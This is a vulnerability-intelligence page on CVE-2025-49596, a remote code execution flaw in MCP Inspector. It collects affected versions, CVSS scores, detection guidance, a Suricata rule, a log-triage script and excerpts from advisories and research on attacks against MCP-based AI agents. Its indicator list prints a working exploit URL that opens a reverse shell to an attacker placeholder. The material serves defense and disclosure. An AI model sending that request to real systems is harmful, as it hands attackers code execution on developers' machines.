CVE-2025-49596
Published 2025-06-13
Priority P188 · critical · 9.4 · CVSS 4.0
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 37.03% (98.3th percentile)
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mcpjam | inspector | >= 0 < 1.4.3 | 1.4.3 |
| modelcontextprotocol | inspector | < 0.14.1 | 0.14.1 |
| modelcontextprotocol | inspector | >= 0 < 0.14.1 | 0.14.1 |
Detection & IOCs (extracted from sources)
url: `http://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=`
url: `hxxp://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser`
- Monitor for HTTP GET requests to the /sse endpoint on port 6277 (including 0.0.0.0:6277) whose query string contains transportType=stdio and command=; this is the canonical exploit path for CVE-2025-49596.
- In patched versions (0.14.1+), the proxy responds with HTTP 401 and the body 'Authentication required. Use the session token shown in the console when starting the server'; the absence of this response on port 6277 indicates a vulnerable instance.
- Alert on processes spawned by the MCP proxy process (node/npx) where the child processes include shells (bash, sh) or network utilities (nc, curl); the proxy spawns new processes based on the command sent by the client.
- Use Shodan or internal asset discovery to identify exposed MCP Inspector proxy instances listening on port 6277; at time of writing 560 instances were publicly exposed.
- DNS rebinding detection: watch for rapid DNS TTL changes where a domain resolves first to a public IP and then to 127.0.0.1 or 0.0.0.0, which can be used to bypass same-origin policy and reach the unauthenticated MCP Inspector API.
- The MCP proxy binds to all network interfaces by default (not just localhost) in vulnerable versions, making it reachable by any attacker on the same network or the internet, not only through localhost-based CSRF attacks.
- CVE-2025-49596 affects all software that embeds or depends on MCP Inspector versions prior to 0.14.1, not just standalone installations.
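The request-level checks above can be combined into one triage pass over HTTP logs. This is an added example, not code from the page or from the MCP Inspector project; the log layout (Common Log Format with a trailing `port=` field), the sample lines and the verdict names are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed layout: Common Log Format plus a trailing "port=<listener>" field.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ port=(?P<port>\d+)'
)
INSPECTOR_PROXY_PORT = 6277
# Child processes the detection notes say to alert on.
RISKY_CHILDREN = {"bash", "sh", "nc", "curl"}

def is_loopback(src):
    try:
        return ipaddress.ip_address(src).is_loopback
    except ValueError:  # hostname or garbage in the source field
        return False

def classify(line):
    """Return None for unrelated traffic, else a finding for a stdio launch request."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET" or int(m["port"]) != INSPECTOR_PROXY_PORT:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if url.path != "/sse" or "command" not in query:
        return None
    if "stdio" not in query.get("transportType", []):
        return None
    command = query["command"][0].rsplit("/", 1)[-1]  # /bin/bash -> bash
    if m["status"] == "401":
        verdict = "rejected"   # patched proxy refused the unauthenticated request
    elif command in RISKY_CHILDREN or not is_loopback(m["src"]):
        verdict = "high"       # accepted shell/network launch, or a remote caller
    else:
        verdict = "review"     # accepted, local, ordinary command: likely a developer
    return {"verdict": verdict, "src": m["src"], "command": command}

def scan(lines):
    return [finding for finding in map(classify, lines) if finding]

# Constructed sample lines (documentation address range, harmless arguments).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jun/2025:10:00:01 +0000] "GET /sse?transportType=stdio&command=sh&args=-c%20id&env= HTTP/1.1" 200 - port=6277',
    '127.0.0.1 - - [13/Jun/2025:10:00:05 +0000] "GET /sse?transportType=stdio&command=node&args=build%2Findex.js HTTP/1.1" 200 - port=6277',
    '203.0.113.7 - - [13/Jun/2025:10:00:09 +0000] "GET /sse?transportType=stdio&command=touch&args=%2Ftmp%2Fx HTTP/1.1" 401 - port=6277',
    '127.0.0.1 - - [13/Jun/2025:10:00:12 +0000] "GET /health HTTP/1.1" 200 - port=6277',
    '127.0.0.1 - - [13/Jun/2025:10:00:15 +0000] "GET /sse?transportType=stdio&command=%2Fbin%2Fbash&args=-c%20true HTTP/1.1" 200 - port=6277',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A loopback source does not clear a request: browser-driven requests (CSRF or DNS rebinding) originate from the developer's own machine, which is why a shell command from 127.0.0.1 is still rated high.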
CVSS provenance
- nvd · v4.0 · 9.4 · CRITICAL · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
- ghsa · 9.4 · CRITICAL
- osv · 9.4 · CRITICAL
- vulncheck · 9.4 · CRITICAL
GHSA
REC in MCPJam inspector due to HTTP Endpoint exposes
ghsa·2026-01-16·CVSS 9.4
CVE-2026-23744 [CRITICAL] CWE-306 REC in MCPJam inspector due to HTTP Endpoint exposes
### Summary
MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE), which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.
### Details
MCPJam inspector binds to `0.0.0.0` making its HTTP APIs remotely reac
OSV
REC in MCPJam inspector due to HTTP Endpoint exposes
osv·2026-01-16·CVSS 9.4
OSV
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
osv·2025-06-13
CVE-2025-49596 [CRITICAL] MCP Inspector proxy server lacks authentication between the Inspector client and proxy
Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Credit: Rémy Marot
GHSA
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
ghsa·2025-06-13
CVE-2025-49596 [CRITICAL] CWE-306 MCP Inspector proxy server lacks authentication between the Inspector client and proxy
VulnCheck
Missing Authentication for Critical Function
vulncheck·2025·CVSS 9.4
CVE-2025-49596 [CRITICAL] Missing Authentication for Critical Function
Affected: Anthropic MCP inspector
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-49596
Exploit PoC: https://vulncheck.com/xdb/ecd7319bf73d; https://vulncheck.com/xdb/eaa00f3add
Suricata
ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)
suricata·2025-07-09·CVSS 9.4
CVE-2025-49596 [CRITICAL] ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)
Rule: alert http any any -> $HOME_NET 6277 (msg:"ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/sse|3f|"; content:"transportType|3d|stdio"; fast_pattern; content:"command|3d|"; content:"args|3d|"; reference:url,www.tenable.com/blog/how-tenable-research-discovered-a-critical-remote-code-execution-vulnerability-on-anthropic; reference:cve,2025-49596; classtype:web-application-attack; sid:2063366; rev:1; metadata:attack_target Server, created_at 2025_07_09, cve CVE_2025_49596, deployment Perimeter, deplo
Nuclei
MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
nuclei·CVSS 9.4
CVE-2025-49596 [CRITICAL] MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
Template:
```yaml
id: CVE-2025-49596
info:
  name: MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
  author: ye11oc4t
  severity: critical
  description: |
    The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over s
```
arXiv
Securing AI Agents in Cyber-Physical Systems: A Survey of Environmental Interactions, Deepfake Threats, and Defenses
arxiv_fulltext·2026-01-28
This manuscript is a preprint intended to rapidly disseminate a survey of security challenges and design principles for AI agents operating in cyber-physical systems. The authors anticipate submitting a substantially revised and polished version to a peer-reviewed journal.
Mohsen Hatami, Van Tuan Pham, Hozefa Lakadawala, Yu Chen*
Dept. of Electrical & Computer Engineering, Binghamton University, Binghamton, NY 13902, USA
{mhatami1, tpham15, hlakada1, ychen}@binghamton.edu
## Abstract
The increasing integration of AI agents into cyber-physical syst
arXiv
Breaking the Protocol: Security Analysis of the Model Context Protocol Specification and Prompt Injection Vulnerabilities in Tool-Integrated LLM Agents
arxiv_fulltext·2026-01-24
## Abstract
The Model Context Protocol (MCP) has emerged as a de facto standard for integrating Large Language Models with external tools, yet no formal security analysis of the protocol specification exists. We present the first rigorous security analysis of MCP's architectural design, identifying three fundamental protocol-level vulnerabilities: (1) absence of capability attestation allowing servers to claim arbitrary permissions, (2) bidirectional sampling without origin authentication enabling server-side prompt injection, and (3) implicit trust propagation in multi-server configurations. We implement ProtoAmp, a novel framework bridging existing agent security benchmarks to MCP-compliant infrastructure, enabling direct measurement of protocol-speci
arXiv
MCPGuard : Automatically Detecting Vulnerabilities in MCP Servers
arxiv_fulltext·2025-10-27
Bin Wang¹, Zexin Liu¹, Hao Yu¹, Ao Yang¹, Yenan Huang², Jing Guo², Huangsheng Cheng², Hui Li¹, Huiyu Wu²
¹Peking University, ²Tencent
{thebinking, zexinliu25, hyu25, jarvisya}@stu.pku.edu.cn, {roninhuang, fyoungguo, pythoncheng}@tencent.com
## Abstract
The Model Context Protocol (MCP) has emerged as a standardized interface enabling seamless integration between Large Language Models (LLMs) and external data sources and tools. While MCP significantly reduces development complexity and enhances agent capabilities, its openness and extensibility introduce critical security vulnerabilities that threaten system trustworthiness and user data protectio
Hackernews
Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
blogs_hackernews·2026-04-20·CVSS 8.0
CVE-2025-65720 [HIGH] Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
## Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
Cybersecurity researchers have discovered a critical "by design" weakness in the Model Context Protocol's (MCP) architecture that could pave the way for remote code execution and have a cascading effect on the artificial intelligence (AI) supply chain.
"This flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories," OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, and Roni
Elastic
MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents — Elastic Security Labs
blogs_elastic·2025-09-19
## MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents
An in-depth exploration of MCP tool exploitation techniques and security recommendations for safeguarding AI agents.
## Preamble
The Model Context Protocol (MCP) is a recently proposed open standard for connecting large language models (LLMs) to external tools and data sources in a consistent and standardized way. MCP tools are gaining rapid traction as the backbone of modern AI agents, offering a unified, reusable protocol to connect LLMs with tools and services. Securing these tools remains a challenge because of the multiple attack surfaces that actors can exploit. Given the increase in use of autonomous agents, the risk of using MCP tools has heightened as users are sometimes automatically accepting calli
19 September 2025 • Carolina Beretta • Gus Carlock • Andrew Pease
Tenable
How Tenable Research Discovered a Critical Remote Code Execution Vulnerability on Anthropic MCP Inspector
blogs_tenable·2025-07-09
Recorded Future
Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
blogs_recorded_future·CVSS 9.4
CVE-2025-49596 [CRITICAL] Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
## Anthropic MCP Inspector: CVE-2025-49596
## What is CVE-2025-49596?
CVE-2025-49596 is a critical remote code execution vulnerability discovered in Anthropic's MCP Inspector tool. MCP is an open standard allowing AI applications to exchange structured context and actions with external tools, and MCP servers are the lightweight programs that expose those tools and data through the protocol. MCP Inspector is a developer-oriented debugging tool for interactively testing and validating MCP server implementations. Successfully exploiting CVE-2025-49596 allows unauthenticated attackers to conduct remote code execution (RCE).
MCP Inspector consists of:
- MCP Inspector Client (MCPI): A web-based UI designed to test and debug MCP servers interactively.
- MCP Proxy (MCPP): A server that functions
- https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979
- https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g
- https://thenewstack.io/mcp-vulnerability-exposes-the-ai-untrusted-code-crisis
- https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596